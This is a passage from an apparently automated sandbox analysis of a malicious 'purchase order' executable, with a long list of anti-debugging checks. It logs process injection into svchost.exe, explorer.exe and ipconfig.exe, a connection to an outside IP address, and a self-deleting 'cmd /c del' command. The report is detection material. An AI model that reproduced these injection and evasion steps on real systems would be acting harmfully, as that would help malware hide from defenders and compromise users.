          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872619 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0384E627 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03866620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03868620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0383262C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0384C640 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038F866E mov eax, dword ptr fs:[00000030h] (2 reads)
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0386A660 mov eax, dword ptr fs:[00000030h] (2 reads)
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03862674 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03832582 mov eax, dword ptr fs:[00000030h]; mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03864588 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0386E59C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038B05A7 mov eax, dword ptr fs:[00000030h] (3 reads)
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038545B1 mov eax, dword ptr fs:[00000030h] (2 reads)
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0386E5CF mov eax, dword ptr fs:[00000030h] (2 reads)
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038365D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0386A5D0 mov eax, dword ptr fs:[00000030h] (2 reads)
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h] (8 reads)
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038325E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0386C5ED mov eax, dword ptr fs:[00000030h] (2 reads)
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038C6500 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03904500 mov eax, dword ptr fs:[00000030h] (7 reads)
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03840535 mov eax, dword ptr fs:[00000030h] (6 reads)
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h] (5 reads)
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03838550 mov eax, dword ptr fs:[00000030h] (2 reads)
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0386656A mov eax, dword ptr fs:[00000030h] (3 reads)
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038EA49A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038364AB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038644B0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038BA4B0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038304E5 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03868402 mov eax, dword ptr fs:[00000030h] (3 reads)
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0382E420 mov eax, dword ptr fs:[00000030h] (3 reads)
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0382C427 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h] (7 reads)
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0386A430 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h] (8 reads)
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038EA456 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0382645D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0385245A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038BC460 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0385A470 mov eax, dword ptr fs:[00000030h] (3 reads)
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03840BBE mov eax, dword ptr fs:[00000030h] (2 reads)
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038E4BB0 mov eax, dword ptr fs:[00000030h] (2 reads)
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03850BCB mov eax, dword ptr fs:[00000030h] (3 reads)
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03830BCD mov eax, dword ptr fs:[00000030h] (3 reads)
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038DEBD0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03838BF0 mov eax, dword ptr fs:[00000030h] (3 reads)
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0385EBFC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038BCBF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h] (9 reads)
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0385EB20 mov eax, dword ptr fs:[00000030h] (2 reads)
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038F8B28 mov eax, dword ptr fs:[00000030h] (2 reads)
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038E4B4B mov eax, dword ptr fs:[00000030h] (2 reads)
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038C6B40 mov eax, dword ptr fs:[00000030h] (2 reads)
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038FAB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038D8B42 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038DEB50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0382CB7E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h] (7 reads)
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904A80 mov eax, dword ptr fs:[00000030h]2_2_03904A80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03868A90 mov edx, dword ptr fs:[00000030h]2_2_03868A90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838AA0 mov eax, dword ptr fs:[00000030h]2_2_03838AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838AA0 mov eax, dword ptr fs:[00000030h]2_2_03838AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03886AA4 mov eax, dword ptr fs:[00000030h]2_2_03886AA4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03886ACC mov eax, dword ptr fs:[00000030h]2_2_03886ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03886ACC mov eax, dword ptr fs:[00000030h]2_2_03886ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03886ACC mov eax, dword ptr fs:[00000030h]2_2_03886ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830AD0 mov eax, dword ptr fs:[00000030h]2_2_03830AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03864AD0 mov eax, dword ptr fs:[00000030h]2_2_03864AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03864AD0 mov eax, dword ptr fs:[00000030h]2_2_03864AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386AAEE mov eax, dword ptr fs:[00000030h]2_2_0386AAEE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386AAEE mov eax, dword ptr fs:[00000030h]2_2_0386AAEE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BCA11 mov eax, dword ptr fs:[00000030h]2_2_038BCA11
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386CA24 mov eax, dword ptr fs:[00000030h]2_2_0386CA24
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385EA2E mov eax, dword ptr fs:[00000030h]2_2_0385EA2E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03854A35 mov eax, dword ptr fs:[00000030h]2_2_03854A35
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03854A35 mov eax, dword ptr fs:[00000030h]2_2_03854A35
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386CA38 mov eax, dword ptr fs:[00000030h]2_2_0386CA38
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840A5B mov eax, dword ptr fs:[00000030h]2_2_03840A5B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840A5B mov eax, dword ptr fs:[00000030h]2_2_03840A5B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386CA6F mov eax, dword ptr fs:[00000030h]2_2_0386CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386CA6F mov eax, dword ptr fs:[00000030h]2_2_0386CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386CA6F mov eax, dword ptr fs:[00000030h]2_2_0386CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DEA60 mov eax, dword ptr fs:[00000030h]2_2_038DEA60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038ACA72 mov eax, dword ptr fs:[00000030h]2_2_038ACA72
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038ACA72 mov eax, dword ptr fs:[00000030h]2_2_038ACA72
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038309AD mov eax, dword ptr fs:[00000030h]2_2_038309AD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038309AD mov eax, dword ptr fs:[00000030h]2_2_038309AD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B89B3 mov esi, dword ptr fs:[00000030h]2_2_038B89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B89B3 mov eax, dword ptr fs:[00000030h]2_2_038B89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B89B3 mov eax, dword ptr fs:[00000030h]2_2_038B89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C69C0 mov eax, dword ptr fs:[00000030h]2_2_038C69C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]2_2_0383A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]2_2_0383A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]2_2_0383A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]2_2_0383A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]2_2_0383A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]2_2_0383A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038649D0 mov eax, dword ptr fs:[00000030h]2_2_038649D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FA9D3 mov eax, dword ptr fs:[00000030h]2_2_038FA9D3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BE9E0 mov eax, dword ptr fs:[00000030h]2_2_038BE9E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038629F9 mov eax, dword ptr fs:[00000030h]2_2_038629F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038629F9 mov eax, dword ptr fs:[00000030h]2_2_038629F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE908 mov eax, dword ptr fs:[00000030h]2_2_038AE908
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE908 mov eax, dword ptr fs:[00000030h]2_2_038AE908
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BC912 mov eax, dword ptr fs:[00000030h]2_2_038BC912
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03828918 mov eax, dword ptr fs:[00000030h]2_2_03828918
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03828918 mov eax, dword ptr fs:[00000030h]2_2_03828918
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B892A mov eax, dword ptr fs:[00000030h]2_2_038B892A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C892B mov eax, dword ptr fs:[00000030h]2_2_038C892B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B0946 mov eax, dword ptr fs:[00000030h]2_2_038B0946
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03856962 mov eax, dword ptr fs:[00000030h]2_2_03856962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03856962 mov eax, dword ptr fs:[00000030h]2_2_03856962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03856962 mov eax, dword ptr fs:[00000030h]2_2_03856962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0387096E mov eax, dword ptr fs:[00000030h]2_2_0387096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0387096E mov edx, dword ptr fs:[00000030h]2_2_0387096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0387096E mov eax, dword ptr fs:[00000030h]2_2_0387096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D4978 mov eax, dword ptr fs:[00000030h]2_2_038D4978
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D4978 mov eax, dword ptr fs:[00000030h]2_2_038D4978
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BC97C mov eax, dword ptr fs:[00000030h]2_2_038BC97C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830887 mov eax, dword ptr fs:[00000030h]2_2_03830887
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BC89D mov eax, dword ptr fs:[00000030h]2_2_038BC89D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E8C0 mov eax, dword ptr fs:[00000030h]2_2_0385E8C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FA8E4 mov eax, dword ptr fs:[00000030h]2_2_038FA8E4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C8F9 mov eax, dword ptr fs:[00000030h]2_2_0386C8F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C8F9 mov eax, dword ptr fs:[00000030h]2_2_0386C8F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BC810 mov eax, dword ptr fs:[00000030h]2_2_038BC810
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03852835 mov eax, dword ptr fs:[00000030h]2_2_03852835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03852835 mov eax, dword ptr fs:[00000030h]2_2_03852835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03852835 mov eax, dword ptr fs:[00000030h]2_2_03852835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03852835 mov ecx, dword ptr fs:[00000030h]2_2_03852835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03852835 mov eax, dword ptr fs:[00000030h]2_2_03852835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03852835 mov eax, dword ptr fs:[00000030h]2_2_03852835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A830 mov eax, dword ptr fs:[00000030h]2_2_0386A830
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D483A mov eax, dword ptr fs:[00000030h]2_2_038D483A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D483A mov eax, dword ptr fs:[00000030h]2_2_038D483A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03842840 mov ecx, dword ptr fs:[00000030h]2_2_03842840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03860854 mov eax, dword ptr fs:[00000030h]2_2_03860854
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03834859 mov eax, dword ptr fs:[00000030h]2_2_03834859
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03834859 mov eax, dword ptr fs:[00000030h]2_2_03834859
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BE872 mov eax, dword ptr fs:[00000030h]2_2_038BE872
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BE872 mov eax, dword ptr fs:[00000030h]2_2_038BE872
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C6870 mov eax, dword ptr fs:[00000030h]2_2_038C6870
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C6870 mov eax, dword ptr fs:[00000030h]2_2_038C6870
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386CF80 mov eax, dword ptr fs:[00000030h]2_2_0386CF80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03862F98 mov eax, dword ptr fs:[00000030h]2_2_03862F98
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03862F98 mov eax, dword ptr fs:[00000030h]2_2_03862F98
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03832FC8 mov eax, dword ptr fs:[00000030h]2_2_03832FC8
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe  Code function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock
          Source: C:\Windows\SysWOW64\svchost.exe  Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\ipconfig.exe  Process token adjusted: Debug
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe  Code function: 0_2_0041F250 SetUnhandledExceptionFilter
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe  Code function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe  Code function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
          Source: C:\Windows\SysWOW64\ipconfig.exe  Code function: 5_2_00CB53F0 SetUnhandledExceptionFilter
          Source: C:\Windows\SysWOW64\ipconfig.exe  Code function: 5_2_00CB51A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\explorer.exe  Network Connect: 156.235.1.30 80
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe  Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exe  Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write (x2)
          Source: C:\Windows\SysWOW64\svchost.exe  Section loaded: NULL target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write (x2)
          Source: C:\Windows\SysWOW64\ipconfig.exe  Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\ipconfig.exe  Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exe  Thread register set: target process: 1028 (x2)
          Source: C:\Windows\SysWOW64\ipconfig.exe  Thread register set: target process: 1028
          Source: C:\Windows\SysWOW64\svchost.exe  Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Windows\SysWOW64\svchost.exe  Section unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: CB0000
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe  Memory written: C:\Windows\SysWOW64\svchost.exe base: 2C9A008
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe  Code function: 0_2_00436CD7 LogonUserW
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe  Code function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe  Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe  Code function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe  Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Purchase order MIPO2425110032.exe"
          Source: C:\Windows\SysWOW64\svchost.exe  Process created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\SysWOW64\ipconfig.exe"
          Source: C:\Windows\SysWOW64\ipconfig.exe  Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe  Code function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
          Source: C:\Windows\SysWOW64\ipconfig.exe  Code function: 5_2_00CB4ACA AllocateAndInitializeSid,CheckTokenMembership,FreeSid
          Source: explorer.exe, 00000003.00000000.2059543443.0000000009B8C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3292694913.0000000009B8D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3095180726.0000000009B8A000.00000004.00000001.00020000.00000000.sdmp  Binary or memory string: Shell_TrayWnd=
          Source: explorer.exe, 00000003.00000000.2055892118.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3286845843.0000000001731000.00000002.00000001.00040000.00000000.sdmp  Binary or memory string: Program Manager
          Source: Purchase order MIPO2425110032.exe, explorer.exe, 00000003.00000000.2057404240.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2055892118.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3286845843.0000000001731000.00000002.00000001.00040000.00000000.sdmp  Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000000.2055892118.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3286845843.0000000001731000.00000002.00000001.00040000.00000000.sdmp  Binary or memory string: Progman
          Source: explorer.exe, 00000003.00000000.2055892118.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3286845843.0000000001731000.00000002.00000001.00040000.00000000.sdmp  Binary or memory string: Progmanlock
          Source: explorer.exe, 00000003.00000002.3285665342.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2055532925.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: PProgman
          Source: Purchase order MIPO2425110032.exe  Binary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
